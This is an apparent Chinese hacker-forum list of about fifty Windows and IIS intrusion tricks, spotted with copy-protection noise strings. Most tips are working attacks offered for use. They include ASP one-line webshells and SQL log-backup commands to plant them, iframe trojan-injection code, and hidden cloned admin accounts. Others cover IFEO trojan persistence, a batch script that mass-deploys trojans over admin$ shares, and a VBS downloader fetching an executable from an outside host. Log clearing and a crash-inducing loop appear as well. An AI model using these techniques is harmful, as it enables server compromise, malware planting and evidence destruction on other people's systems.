Xp系统修改权限防止病毒或木马等破坏系统,cmd下,; p5 ~) ?% o; t/ d, G
cacls C:\windows\system32 /G hqw20:R
8 R! m# O" e1 p4 ?8 t思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
, c) @7 u. H; Q, a$ ~% n( V恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F7 |4 _: z5 K7 ]6 F2 M3 W
" ~0 H. i, n) u. `; [2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
1 J4 @' _! t" o" G* l' \6 a8 F. G1 O$ j# l; T) y2 U
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。* ?7 [! n) H! ^ x0 u8 G! k _
! P3 {* V" ^( R7 Q
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号" A- v* V$ P/ v0 R# t, S# a
( I7 [, ?' X. }. m
5、利用INF文件来修改注册表5 k1 w, U/ e A/ p
[Version]! i) E' w* Z5 F8 ~( u" q& l
Signature="$CHICAGO$"
. S2 V9 Z1 Y- P9 E# w& h$ ?[Defaultinstall]
; b# i2 U: B4 R% c& z4 LaddREG=Ating
" p, H+ ]; |: ~5 m* K1 J[Ating]- l7 X" X2 E- O+ N; f4 p ~
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
1 A, M. k c/ e- L$ W3 y+ U( J2 T* h以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
0 d1 q$ ^4 R. a2 I. C& ]rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径5 H/ f* S6 ]8 E# n1 b4 l
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
: v5 p7 S8 u5 T! y+ T& AHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU0 r1 N: T% v" ~ V: V, o H
HKEY_CURRENT_CONFIG 简写为 HKCC
3 j. g9 q2 g0 W9 i, O0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
$ a# E1 }! I* i( N"1"这里代表是写入或删除注册表键值中的具体数据
6 [" h2 a3 o% ^4 M8 d7 Q
2 V. D- T5 W# O6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,0 ~: i( m. V/ s. y2 p3 a6 Q7 K/ q, z
多了一步就是在防火墙里添加个端口,然后导出其键值5 [$ Z6 y7 k) F" {6 w& r7 }
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
" S5 U. Z, m+ `7 Q* C. X/ n3 W! Z, a2 h8 N* m6 B
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽/ K$ p8 d, S; \1 v1 H# h! \
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。# r, D/ B Z* g& t
* `! q* \" n! ]& Z/ ?
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。) O* @& s8 x' {+ A% W7 h
& q% @1 V( I) Z
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,2 `3 h8 \. f( _' u
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。8 H5 n) O) w- ~& p1 x
& [& ^- S) Z: ^1 K) O
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”1 U( R, s0 n# Z% ?5 N: b
5 {! c% m- H, C! {( u11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,1 U4 ^9 g% Y( ]2 B
用法:xsniff –pass –hide –log pass.txt
6 ]& F, F& f* Z/ R" h" i3 ]: |1 R& l* O/ C, b0 Z
12、google搜索的艺术
& i" a, x/ U% U* z6 i搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
9 W' d8 P4 r, V+ l2 i) X( o或“字符串的语法错误”可以找到很多sql注入漏洞。
+ k. t3 D) y' P8 K- Z% d4 O4 r) e: G0 U- d& u6 @, m! C7 E5 |
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。& D9 l' K! k& j/ d) W
& U: {* w5 t0 V* q14、cmd中输入 nc –vv –l –p 19875 u" q# }; |* P$ H
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
- X+ G* S: l9 _5 Y# I3 e
; S) ?9 P" v/ G4 f0 t15、制作T++木马,先写个ating.hta文件,内容为0 M$ |/ o( ], v( K4 O
<script language="VBScript">
( |( T8 ]# V1 I3 mset wshshell=createobject ("wscript.shell" ): M( x7 C1 D) z+ x0 |& y$ ]: o3 Q5 y2 p
a=wshshell.run("你马的名称",1); |6 p5 g3 g. \" v) B# c6 t; y
window.close
- ]1 {* `, @/ W& u</script>
6 v# f9 t0 G- I$ h( W6 z' |再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
: a+ _$ N$ ]" n5 j
) U6 R7 a5 T, k# q! W e16、搜索栏里输入7 A2 h9 ^9 c$ R0 F" a. {9 D
关键字%'and 1=1 and '%'='
! c% I4 u" V+ Z关键字%'and 1=2 and '%'=' N7 _: O8 W, s( s% w2 U/ Z
比较不同处 可以作为注入的特征字符
0 J7 p1 Y5 E( q2 Z: {6 T! [% O- |+ N4 m
17、挂马代码<html>/ I7 a0 D! s- \$ G/ e2 C4 z( Q- B" e6 ?
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>6 S9 \/ S3 E- u+ B6 N9 U& s
</html>
' r8 `4 A5 z4 U3 M; @. X! P) D
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆," S5 }$ P0 K, D
net localgroup administrators还是可以看出Guest是管理员来。
% a, a/ b+ v: [% c) e7 a2 t. B! p" X1 b: b5 a' x9 b+ x7 D
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
( R1 ~) J$ |$ o% |4 E5 n: x3 V& P用法: 安装: instsrv.exe 服务名称 路径
6 M/ X y+ ]6 z: G# m, o卸载: instsrv.exe 服务名称 REMOVE& u! H: z; d6 B( g0 n' c2 l, ]
0 {8 |; W9 Z3 x9 q9 {& a9 B$ `
2 h, ?8 _3 j3 M! J! K# z5 A# W6 n21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉/ _1 G" V5 q& H: i
不能注入时要第一时间想到%5c暴库。) q, \3 L/ P$ \. ]9 q8 O
- @ E# \" _: p0 @, M( a
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
) m% [" n% j/ a, ]3 v$ u5 }3 `4 Y. X
23、缺少xp_cmdshell时+ p! V* K# l* V+ I3 V/ v6 Z6 E4 F
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'9 Z: X3 I/ L0 ?7 H
假如恢复不成功,可以尝试直接加用户(针对开3389的)
* r) v R7 [' v2 D4 w7 ~declare @o int
4 g3 A3 d) J2 zexec sp_oacreate 'wscript.shell',@o out- J! x% l8 v' K4 v4 U4 w
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员- ^. t A, b8 f) N1 g$ B8 B1 T$ W* x3 e
: Z, V9 w' \+ G4 V; n# V4 l L
24.批量种植木马.bat
/ n2 g0 n' u# C" | vfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
% y f h ^: w6 wfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间! e# K9 `( v, g; E- f+ A* b
扫描地址.txt里每个主机名一行 用\\开头
% P/ C0 V# }2 a' a
' D+ E! f2 ]5 ^# p' R6 J25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。. Q' v/ g* \5 B/ ~3 }/ `
$ W' s3 y' ^1 ?; N$ X26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.: B" q% {) `8 S, p
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
. h$ y- e% ~5 ?0 n( L$ _( t.cer 等后缀的文件夹下都可以运行任何后缀的asp木马: A4 u$ w4 ?+ \1 i
- b1 _/ t/ @- N
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP9 ^" `$ {( W- r" a P' ?9 h
然后用#clear logg和#clear line vty *删除日志% V0 I7 w8 b6 X
' k2 B; V9 |( @5 g28、电脑坏了省去重新安装系统的方法! l9 r/ q) I0 H% _
纯dos下执行,
* ?! N3 W; n' g$ z, \) Rxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config- Y* x* V! G7 S: u6 d9 B
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config$ R1 }4 S0 J7 K2 y
u( s( ?, W' e( X
29、解决TCP/IP筛选 在注册表里有三处,分别是:
" z9 H% N' Q4 b" M4 k/ y0 S6 LHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
0 l5 H8 e" W# e' l; C3 {* iHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
' V* [3 ~9 V I5 p0 F0 p0 yHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip4 R$ o* `) z z/ z8 v+ X
分别用
5 [" s$ L8 m" Aregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
/ R) T6 G1 X9 U a$ Gregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip7 m: P1 C) q& o1 L
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip; H, l u" ]" T& B# S# n: L, O' S
命令来导出注册表项
/ a% M2 _! i1 @ v然后把三个文件里的EnableSecurityFilters"=dword:00000001,
* O! J0 I% h5 E! [; H7 ?, q改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用3 J; V8 `9 R! \; c) G7 c: c1 Q2 {
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
/ w- B$ p4 k R L' d. `; u) ]8 z* R( ^% g
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U5 E* T" U- p& A# O2 ]) m" {$ D
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
; ]4 ?# p( O3 d, @& c" E! w: O+ O, o7 x- g" s) R
31、全手工打造开3389工具
# B+ b* k' u1 i. x8 R打开记事本,编辑内容如下:8 K' S8 s9 o0 k4 m
echo [Components] > c:\sql
+ {- i; r' n: M9 K/ t4 gecho TSEnable = on >> c:\sql
. a k6 ?- [2 q& }( I. z# Ysysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
& _& c! U/ K% m; h编辑好后存为BAT文件,上传至肉鸡,执行
. o+ E r- X) W" x: F# }$ D9 H0 ?3 C2 y+ V* f5 x v" s
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马/ U8 L5 [/ B" C y
1 p# h i. q3 h, V) t/ b33、让服务器重启
5 k3 n* n% |. H" k% ^8 g9 L/ O写个bat死循环:
" _3 k2 t# r/ O6 ^@echo off3 H4 x9 @: _8 z0 Z4 `+ F
:loop1
+ R8 }7 w: Z3 P2 Icls
3 [) M5 g5 H- \9 m' e' \start cmd.exe
% T, [" t& j$ _goto loop18 @, `8 }: N0 M U
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
3 y' {1 H8 K! p4 ?* e, j4 T$ p2 M9 B7 \/ e# W, h* q
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,0 Z* T7 t( }! `/ e' g
@echo off
, S- A+ E& Z2 K. c' Odate /t >c:/3389.txt$ U, D; z+ b% J1 {) E$ E
time /t >>c:/3389.txt5 i& D; f9 x, I
attrib +s +h c:/3389.bat% x/ j h( B9 V/ B
attrib +s +h c:/3389.txt
+ e& ?. m f7 Z( p: w# Fnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt) x# g# u }% E5 Y9 o
并保存为3389.bat# Y2 S: P9 p- t) j5 l" w1 _
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号0 ~; e" z. E, z
4 k2 s& U% c) b8 e4 k" S35、有时候提不了权限的话,试试这个命令,在命令行里输入:1 |) `$ B' C& E1 A, m3 } q( E
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
" m0 p4 n5 I- ?8 k( d2 w输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。. R. y1 b' w) m0 y% b% A: J t
; E, k" N. @5 K/ {/ e. h
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件/ \* D+ r. F5 q N6 r, I1 L
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
g* h7 W& q |$ Secho 你的FTP账号 >>c:\1.bat //输入账号
- `0 W' M1 W O+ kecho 你的FTP密码 >>c:\1.bat //输入密码. i2 L! K" P. Q
echo bin >>c:\1.bat //登入
) I3 z4 j' Q8 s; \0 u% Kecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么1 _* _6 V0 @# u/ x) R
echo bye >>c:\1.bat //退出
& v3 m# F1 ~$ m' K然后执行ftp -s:c:\1.bat即可
# N l9 ~2 p9 ]
2 U* k" a& u9 V$ E5 n2 B37、修改注册表开3389两法
6 g) m& j9 e' u; F(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
% `4 \7 p0 @/ o6 I$ |9 C* eecho Windows Registry Editor Version 5.00 >>3389.reg
( \) u# l2 t9 ]( w( Xecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
' A% b; J7 y0 I4 H; X* B* U# @echo "Enabled"="0" >>3389.reg6 a+ N# J9 r* ~9 r7 }8 [" J" Q6 q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
: j3 `9 N+ K0 @6 Y5 W4 |NT\CurrentVersion\Winlogon] >>3389.reg$ @! `- k4 m* B1 C: m9 S
echo "ShutdownWithoutLogon"="0" >>3389.reg' ]- ?2 Q- K. ?3 l: Z% X6 b( ~3 u
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]+ I$ p! H0 f6 X
>>3389.reg
3 U% a' z- x- Q% k7 j# U, hecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg4 ?0 k5 [2 j8 | r$ b3 O! J) w* s! u1 F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]+ r' N& f0 Y7 N: X1 o; a
>>3389.reg
$ {) C6 `/ v5 T# T$ Y% s/ p$ f/ t3 Zecho "TSEnabled"=dword:00000001 >>3389.reg% H! c* N2 Z( T/ p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg' M+ a4 q1 @% ~' h$ m) ^9 z
echo "Start"=dword:00000002 >>3389.reg
1 H! }2 \- N) U7 becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]% I4 b6 s2 v. s4 g" n* K; R8 V0 i
>>3389.reg
( H" T9 B0 \8 r$ Recho "Start"=dword:00000002 >>3389.reg! T0 C' h9 t: z1 z
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg: S7 e K* ] @; q( i
echo "Hotkey"="1" >>3389.reg$ R' X% H4 F2 U( W. U+ r# m$ b+ ~" N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal; J3 D- A; }0 | R5 }1 C
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
2 W6 \" P* Q0 Z7 r& X2 i5 q8 Oecho "PortNumber"=dword:00000D3D >>3389.reg
! M( M& o9 ~3 m! k/ wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 {/ C/ y; y/ x. q7 B% L6 wServer\WinStations\RDP-Tcp] >>3389.reg1 p4 e+ b" a# w
echo "PortNumber"=dword:00000D3D >>3389.reg1 n& _5 Q) T2 `" U9 F& f
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
: E, a! I0 u* a. i(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
4 |* p. S; ?5 {; X因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效9 Q& j b% z7 C" f
(2)winxp和win2003终端开启9 I0 |3 v8 x* n
用以下ECHO代码写一个REG文件:1 D1 g6 t% c$ S
echo Windows Registry Editor Version 5.00>>3389.reg5 c* G% S1 v1 l& l) `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; D c0 b6 E: ]Server]>>3389.reg( _( _0 Y* y! O: d8 [
echo "fDenyTSConnections"=dword:00000000>>3389.reg
' ]' f# f" I( b T* Z$ Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) C" W7 r X. s# N* o
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
- C; r% F% S$ C) iecho "PortNumber"=dword:00000d3d>>3389.reg1 d0 _0 F7 n# f! `% P- z, z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal& q0 b- R( I+ h+ e
Server\WinStations\RDP-Tcp]>>3389.reg+ L1 E3 V1 _' Y
echo "PortNumber"=dword:00000d3d>>3389.reg
- v! a7 n: M2 `+ l* n然后regedit /s 3389.reg del 3389.reg, e" Z" ~* h! Z0 m' F
XP下不论开终端还是改终端端口都不需重启
" z: j( i( Q) D/ L3 c( C; t# z+ s9 l
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃! |7 K4 s7 t" _3 S. d; j/ G9 [
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'1 ^, O+ o& {5 j0 M. i' _$ b
f4 F2 P7 I$ P/ q; Y. S: i39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
: O* }( o, D6 B(1)数据库文件名应复杂并要有特殊字符2 L A2 d! O! X/ |
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
3 U z1 A# Z( ~9 s9 J( \9 n( \; E将conn.asp文档中的+ o1 \0 o- f! Y2 _9 K
DBPath = Server.MapPath("数据库.mdb")
6 G+ |# x; c5 Z' s& k5 cconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath' J r& a6 W' i0 C4 l1 \
6 {0 R- {! g& S- R! {修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
0 _7 x" A: I: l1 G3 T4 P: f6 G(3)不放在WEB目录里
6 Y6 `2 A& B9 i% b5 j
* k9 I6 t9 a; q40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉4 ^# r0 J0 e; J) F3 {
可以写两个bat文件
. T7 T5 n/ |% o) R@echo off
% ?, h7 R; i- B% J6 Q1 |3 b@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
5 ^6 N7 M- H' Y4 p@del c:\winnt\system32\query.exe
8 f! l. m+ Y0 D8 Q@del %SYSTEMROOT%\system32\dllcache\query.exe/ ?1 b$ D+ y4 |
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的2 O9 k+ E+ P r5 V
- U) o- B$ v2 v@echo off2 k) o4 S- ~2 l5 a7 a! |7 N6 j
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
' E/ l7 R4 R! r$ R@del c:\winnt\system32\tsadmin.exe
+ z1 V2 a7 z& t6 H# b- l@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex0 Z$ W& a. V* ]2 ]# \: |9 W. z
# l3 E* q0 b4 Q7 f- Y1 l41、映射对方盘符! m8 s& c8 ^6 K9 i! d5 _
telnet到他的机器上,9 C4 I4 {9 W2 d1 z
net share 查看有没有默认共享 如果没有,那么就接着运行
; a& S, C% N& b7 R3 m' }net share c$=c:! O# z E2 \, o5 y$ I( X
net share现在有c$2 R& O1 z) K% @5 n B$ Q
在自己的机器上运行
5 y( T- P/ m r7 s, i/ r- Ynet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
2 {. c/ l8 W" Q- ?3 k$ H
- B: X% f8 j/ ]3 U" x f7 M42、一些很有用的老知识
/ }& s" i' C& ktype c:\boot.ini ( 查看系统版本 )" L6 \/ ?8 E$ X
net start (查看已经启动的服务)9 o! R( o2 S# g8 v q! H
query user ( 查看当前终端连接 )
0 c* Y& P$ i) L6 \net user ( 查看当前用户 ); D- M/ I2 M6 x0 M8 Z4 _
net user 用户 密码/add ( 建立账号 )7 J1 [$ U7 B& F6 i, c
net localgroup administrators 用户 /add (提升某用户为管理员)
! A* q f' @0 Tipconfig -all ( 查看IP什么的 )9 C! l$ v5 U8 p9 g1 [$ l$ f
netstat -an ( 查看当前网络状态 )
% R0 @+ |- Z/ I8 p7 {findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)* C: N5 X' T/ k6 [; Q
克隆时Administrator对应1F4
1 L9 q; e, J+ Y# X& `% r5 rguest对应1F5
5 u+ N" k' q" w0 E2 }. ftsinternetuser对应3E8" X( o: r( Q# `+ J. p3 N( w7 D
8 U" }% @+ c7 l7 M; k/ K* ]43、如果对方没开3389,但是装了Remote Administrator Service
) Y6 h6 `3 F- m) r) ` T: ~用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接$ x5 B' D6 h# o5 C. i, s1 ]
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息) O8 G$ F" O( t6 g. f
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"( R+ ?) z; c* K- l% ^
+ W! P2 M, T) f- F( \5 T4 `2 z
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
' l8 l& y9 Z" l/ o: H- }2 H本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
9 i# n9 v5 i( g4 U- a8 a; |& @3 J4 [
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)# v2 k3 ]0 O7 z( B
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open% Q4 Z6 W; @" P K
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
A2 j" m, |/ A+ B2 ?& iCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
7 g! E- T* `. L& x% K, F: T5 n+ T1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
( [: g5 S5 J7 `. K/ F9 C4 d& R(这是完整的一句话,其中没有换行符)0 w6 g7 T/ F3 p0 b, J/ @* T
然后下载:
5 j0 y7 g* ^ ?cscript down.vbs http://www.hack520.org/hack.exe hack.exe
( T; i$ R$ w' g+ n# o4 {, G
6 f; b+ G( Y u46、一句话木马成功依赖于两个条件:3 s! l$ ?( [2 i+ ?" A; X8 G* Z/ I
1、服务端没有禁止adodb.Stream或FSO组件
, u6 B5 i- N& m, a" R2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。% t) O# S6 M& d2 v& p8 p3 E
, ^- m# r) X Y9 H9 @# g47、利用DB_OWNER权限进行手工备份一句话木马的代码:
* t' u/ q2 z- q6 h; K7 b;alter database utsz set RECOVERY FULL--
- y/ \/ `$ y4 {1 G! ?3 Z;create table cmd (a image)--
% Y4 ?0 Y! w+ W0 O* b2 d;backup log utsz to disk = 'D:\cmd' with init--! b, ~8 i; j2 M. J- a8 L" O
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
" m- B7 j+ h q2 F. U' i;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
: Q/ `3 E7 R. k6 A3 U2 U注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。; p' \5 u/ b8 }$ `$ v. u* `
* V$ E J( W o
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
' c. m% ?: D" F; m$ |( ^. f0 x: x) o6 _
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
* d- { ~* t9 }所有会话用 'all'。5 f% N o* s2 p7 w1 A9 t# {
-s sessionid 列出会话的信息。
5 m; z8 w5 ?9 p% x, H/ f-k sessionid 终止会话。
8 ~8 @2 V6 H. E$ K( d-m sessionid 发送消息到会话。1 z1 b) [) y# ^ s
' b9 ~9 ^: ^4 \/ I1 y3 J3 Aconfig 配置 telnet 服务器参数。, h! h& M& o4 Q7 ^. M
% b% B6 A# w! A+ Tcommon_options 为:# O4 R7 x) J( b8 ^. ?( {
-u user 指定要使用其凭据的用户+ e, D4 j8 e; I. R6 k" @2 ?
-p password 用户密码 C/ n$ W* H" @4 _
* @% }7 X2 Y6 C, b+ u- T; z) `
config_options 为:
8 _$ I0 P# E( v0 mdom = domain 设定用户的默认域3 w3 h0 _4 a* f5 P$ @, {9 w8 t* s
ctrlakeymap = yes|no 设定 ALT 键的映射
* f: v) ?; K wtimeout = hh:mm:ss 设定空闲会话超时值8 u. [ u5 P0 ^4 A- W+ _2 W" l: a* X
timeoutactive = yes|no 启用空闲会话。
5 P/ d3 ^2 s' lmaxfail = attempts 设定断开前失败的登录企图数。5 `% F0 I! x$ i
maxconn = connections 设定最大连接数。7 y& y& @0 D4 x; g( B9 Y, |% T
port = number 设定 telnet 端口。. d" v8 n5 j6 ^5 C0 B9 H9 T+ I1 ]' d
sec = [+/-]NTLM [+/-]passwd
- d+ e, G4 {& [' i5 }设定身份验证机构0 U/ H( D% U& d5 D0 Y
fname = file 指定审计文件名。
e. L# ?, k* P) r# ]. F% Kfsize = size 指定审计文件的最大尺寸(MB)。# |- k( \. s+ \8 o& Y1 ?/ e
mode = console|stream 指定操作模式。6 {+ Z% Q. J6 Q% r# D0 l1 x# u
auditlocation = eventlog|file|both8 b4 v' U6 h3 e* s. K' [
指定记录地点
4 w* O' |+ h @1 Paudit = [+/-]user [+/-]fail [+/-]admin
" F+ o/ f+ Z. T" y; Y( n/ I1 p: _- A1 {( X: O# l) e+ F/ k! i2 a
49、例如:在IE上访问:
8 N% a" [1 U: K% ^0 awww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
" ~2 A; R3 K% C% ~hack.txt里面的代码是:+ K& ]6 e* |7 f; d. d2 m
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
, Q% ]2 }. ?, m/ M+ E0 U7 W把这个hack.txt发到你空间就可以了!* D% [, ?) z a# q
这个可以利用来做网马哦!
7 C1 B% y' A8 E$ {) S, X8 x; v. p% s
_: y D' ?( k, {9 ?- V50、autorun的病毒可以通过手动限制!
& ?5 l; H; l, Y/ R# Z! J' h1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!( W( d3 [5 T( |/ Z+ p8 o
2,打开盘符用右键打开!切忌双击盘符~; j8 Q& W$ B8 z d1 H
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!; i/ a% J0 V/ D/ z! ^9 y1 l; O6 }+ t
- ]. I" Z R6 [& `- `4 L- F51、log备份时的一句话木马:
% U4 u5 P/ |, d: a v6 Za).<%%25Execute(request("go"))%%25>9 t( h) ^( X- I+ K, @3 W0 A. n
b).<%Execute(request("go"))%>5 H" {+ t/ x. v6 H0 _5 \% s& e
c).%><%execute request("go")%><%
# L9 H7 V% y4 `, B* Bd).<script language=VBScript runat=server>execute request("sb")</Script>$ n* I( t2 J0 j8 ?, f
e).<%25Execute(request("l"))%25>
4 [5 z$ h) R5 ]f).<%if request("cmd")<>"" then execute request("pass")%>
- D/ N# l* v3 b$ K/ U5 J( X$ k/ F1 g' i4 l0 u# K( M
52、at "12:17" /interactive cmd$ s( o! C5 _/ e) g
执行后可以用AT命令查看新加的任务
9 z: H# i# R/ ^4 B8 z用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。2 M: O% _; O* j8 r+ o% ^4 d' t5 d
7 i' s+ C) N( `7 C& G
